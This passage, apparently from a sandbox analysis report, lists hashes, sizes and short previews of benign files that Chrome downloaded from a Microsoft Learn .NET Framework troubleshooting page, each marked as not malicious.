                                                                                                                                                                                    SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                    MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                    SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                    SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                    SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1154
                                                                                                                                                                                    Entropy (8bit):4.59126408969148
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                    MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                    SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                    SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                    SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3130
                                                                                                                                                                                    Entropy (8bit):4.790069981348324
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                    MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                    SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                    SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                    SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):15427
                                                                                                                                                                                    Entropy (8bit):7.784472070227724
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                    MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                    SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                    SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                    SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):464328
                                                                                                                                                                                    Entropy (8bit):5.074669864961383
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                    MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                    SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                    SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                    SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                    Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):179335
                                                                                                                                                                                    Entropy (8bit):5.435182897681627
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVa:Wof3G0NSkNzMeO7z/l3a
                                                                                                                                                                                    MD5:517954FBCEBC2B0669606202492A4888
                                                                                                                                                                                    SHA1:404819BEF2964D493DF3CB29102719025BEA48AF
                                                                                                                                                                                    SHA-256:211DF9427FF68A7AA97490D30BABCEC089295E6219D461DD2946D24FE919DAEF
                                                                                                                                                                                    SHA-512:21F79D8CB099D874CB2AD32BCE04ADBDE919F3499363E51FE875C0EB409A4EEF555F349351DAB84E39214E26F5320E6E472C0A6A7C06A4CA9EFD1421174CA0C3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):25422
                                                                                                                                                                                    Entropy (8bit):5.151101794904936
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                    MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                    SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                    SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                    SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):207935
                                                                                                                                                                                    Entropy (8bit):5.420780972514107
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                    MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                    SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                    SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                    SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                    Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):25422
                                                                                                                                                                                    Entropy (8bit):5.151101794904936
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                    MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                    SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                    SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                    SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                    Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):15427
                                                                                                                                                                                    Entropy (8bit):7.784472070227724
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                    MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                    SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                    SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                    SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):52717
                                                                                                                                                                                    Entropy (8bit):5.462668685745912
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                    MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                    SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                    SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                    SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1432
                                                                                                                                                                                    Entropy (8bit):4.986131881931089
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                    MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                    SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                    SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                    SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                    Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):52717
                                                                                                                                                                                    Entropy (8bit):5.462668685745912
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                    MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                    SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                    SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                    SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                    Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1173007
                                                                                                                                                                                    Entropy (8bit):5.503893944397598
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                    MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                    SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                    SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                    SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
